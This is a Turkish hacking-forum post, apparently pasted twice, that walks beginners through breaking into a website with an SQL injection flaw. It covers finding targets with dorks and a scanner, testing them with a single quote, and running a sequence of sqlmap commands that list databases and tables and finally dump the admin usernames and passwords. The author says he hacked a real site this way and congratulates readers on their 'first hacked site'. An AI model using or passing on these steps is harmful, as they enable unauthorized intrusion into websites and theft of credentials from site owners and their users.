Hepinize Merhaba değerli AS ve ÜSTLERİM
Forumda cevabına tam rastlayamadığım sql açıklı site veri tabanına sızma basit bir şekilde söylemek gerekirse site hackleme konusana değneceğim
----------------------------------------
SQL NEDİR:Structured Query Language
Türkçe karşılığı iseYapılandırılmış sorgu dilidir
----------------------------------------
Genelde Forumu yeni keşif eden arkadaşlarımızın sorduğu soru şu site nasıl hacklerim bir site hacklemenin birden fazla yolu vardır ama bu göstereceğim yöntem kolaylarından olup basit bi site hacleseniz dahi size özgüven katacak bir yoldur
Tabi bir site hackleyerek hacker olunmadığını hepimiz bilmekteyiz
-------------------------------------------
Gelelim sql açıklı bir site nasıl hacklenir öncelikle konularımda ATSCAN kullanımı adlı sql açıklı site taraması yapan bir program var buraya gelmeden oraya bir göz atın isterseniz kafanız karışmasın
-------------------------------------------
Ben size sql açığını bulup kendim hacklediğim bir siteden örnek vericem
Başlayalım
Sitemiz Bu
Peki ama açık olup olmadığı nasıl anlıyacağız
Sitenin dorklarınını denedikten sonra yapanız gereken şey
sadece basit bir (TIRNAK) (') işareti koymak olucaktır
----------------------------------------------
Sitemizi bulduk peki nasıl sızabiliriz
KOD:sqlmap -u siteadresi.com/php?id=9 --dbs
-u =Erişmek istediğimiz site adresi
--dbs=sitede hangi konuma erişmek istediğiniz
php?id=9ise sitede sql açığı bulunan dizin
ENTER YAPALIM
----------------------------------------------
Yukarıda gördüğümüz gibi bize sitenin şemalarını sundu
Şimdi ise siteninde dosyalarının içinde bulunduğu şemanın içerisine girmek
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb --tables
Gördüğünüz gibi bize admin panelinin de bulunduğu 9 kolonlu bir şema verdi
-----------------------------------------------
Yapmamız gereken son adımlardan biri ADMİN paneline erişip password ve kullanıcı adını almak olucak
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin --column
Resimde gördüğünüz gibi pass ve uname adlı klasörleimiz var
------------------------------------------------
Ve son olarakta bunları öğrenmeye gelelim
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin -C pass,uname --dump
dedikten sonra bize aşağıda şifre ve kullanıcı adını vericektir
HAYIRLI OLSUN İLK SİTENİZİ HACKLEDİNİZ DAHA YOLUNUZ ÇOK UZUN
SAYGILARIMLA ŞahMat
Forumda cevabına tam rastlayamadığım sql açıklı site veri tabanına sızma basit bir şekilde söylemek gerekirse site hackleme konusana değneceğim
----------------------------------------
SQL NEDİR:Structured Query Language
Türkçe karşılığı iseYapılandırılmış sorgu dilidir
----------------------------------------
Genelde Forumu yeni keşif eden arkadaşlarımızın sorduğu soru şu site nasıl hacklerim bir site hacklemenin birden fazla yolu vardır ama bu göstereceğim yöntem kolaylarından olup basit bi site hacleseniz dahi size özgüven katacak bir yoldur
Tabi bir site hackleyerek hacker olunmadığını hepimiz bilmekteyiz
-------------------------------------------
Gelelim sql açıklı bir site nasıl hacklenir öncelikle konularımda ATSCAN kullanımı adlı sql açıklı site taraması yapan bir program var buraya gelmeden oraya bir göz atın isterseniz kafanız karışmasın
-------------------------------------------
Ben size sql açığını bulup kendim hacklediğim bir siteden örnek vericem
Başlayalım
Sitemiz Bu
Peki ama açık olup olmadığı nasıl anlıyacağız
Sitenin dorklarınını denedikten sonra yapanız gereken şey
sadece basit bir (TIRNAK) (') işareti koymak olucaktır
----------------------------------------------
Sitemizi bulduk peki nasıl sızabiliriz
KOD:sqlmap -u siteadresi.com/php?id=9 --dbs
-u =Erişmek istediğimiz site adresi
--dbs=sitede hangi konuma erişmek istediğiniz
php?id=9ise sitede sql açığı bulunan dizin
ENTER YAPALIM
----------------------------------------------
Yukarıda gördüğümüz gibi bize sitenin şemalarını sundu
Şimdi ise siteninde dosyalarının içinde bulunduğu şemanın içerisine girmek
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb --tables
Gördüğünüz gibi bize admin panelinin de bulunduğu 9 kolonlu bir şema verdi
-----------------------------------------------
Yapmamız gereken son adımlardan biri ADMİN paneline erişip password ve kullanıcı adını almak olucak
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin --column
Resimde gördüğünüz gibi pass ve uname adlı klasörleimiz var
------------------------------------------------
Ve son olarakta bunları öğrenmeye gelelim
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin -C pass,uname --dump
dedikten sonra bize aşağıda şifre ve kullanıcı adını vericektir
HAYIRLI OLSUN İLK SİTENİZİ HACKLEDİNİZ DAHA YOLUNUZ ÇOK UZUN
SAYGILARIMLA ŞahMat
Son düzenleme:
